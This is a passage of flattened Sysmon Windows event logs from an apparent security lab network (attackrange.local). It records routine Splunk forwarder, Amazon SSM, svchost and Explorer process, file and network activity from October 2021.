Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4697F8994A3AB2BE25A1AB7A9A1491AE,SHA256=15C2C1B61A52655F46475534C160D3463137734FAE26A6987E703EE70262CD48,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103563Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:52.374{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103562Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:52.374{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103561Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:52.374{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103560Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:52.374{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103559Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:52.374{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103558Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:52.374{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103557Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:52.374{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103566Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:53.671{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EF548CBF701B1325EE015DF8DF7F37B,SHA256=7CA04FE8A486B6BA663E33B8A593DCCCC182DFBC0B4DD854EF51F34E6A19E244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081431Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:53.562{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DD7EC865C685CC3BD4D7FD1BD531A8C,SHA256=A61B14076EF89F69D69D7B38630A3641D682BA6051838F281E78069A77598784,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081432Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:54.562{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3547CAB330264AEDDB1051FD10BC88C8,SHA256=76DDD35A8595258D17C257E1FB9E42E652F6315F129AB73105FDAAFF3283E4A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103567Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:54.702{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6B79E380580791DBA78DAB8BF628DC,SHA256=E07CDA9581C133E60A047997E811A4B7D4B8D75C88EC9803D786315F1AEF3E22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103568Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:55.718{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=669367C3DD52EB3747CD25B37C53A0D3,SHA256=455A66A51E53AC4DDE31EF6F5E8CA6F5A11CCBA3C808954CCA80359B7B2D4CE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081433Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:55.562{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=918D724620A8467C299452726EB05A35,SHA256=D8751E9C1A98E510D5816BA6ED010E56E8A4F3836726B017EB10501E43ABA6C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103570Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:56.832{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103569Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:56.738{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB038239279A5DAEA8831572E20F0B44,SHA256=0D2E72A3FF9F0803A5B5A1036A4AB6D2C8AF3D09484F251A28499DBC98E7A715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081435Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:56.617{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-023MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081434Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:56.617{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE9E8C615D2E3842C03765AA39C3C1EF,SHA256=C72184A4A7A6A8EE631DA8FA49C6FF65627F546C21474DBE47EF92CA72AB628B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103572Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:56.475{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49527-false10.0.1.12-8000- 23542300x8000000000000000103571Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:57.738{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=049727D1C7E511426A8A1144F6468FF2,SHA256=3271DE8BA69BFF0DDC773CC00CE53E8416210320D6680F80C57FDD59B277272D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081438Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:54.583{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50027-false10.0.1.12-8000- 23542300x800000000000000081437Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:57.635{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F3DA28A9946AFF83F16EEFF7BE3E304,SHA256=E27FF912DF13E4071980F30597FD80040ED3265EEF7FC0E18027EC4DF6A6A7FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081436Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:57.631{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-024MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081452Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B262-615A-4801-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081451Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081450Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081449Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081448Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081447Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081446Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081445Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081444Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081443Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081442Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B262-615A-4801-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081441Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.973{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B262-615A-4801-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081440Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.974{2FDD8D40-B262-615A-4801-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081439Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:58.708{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 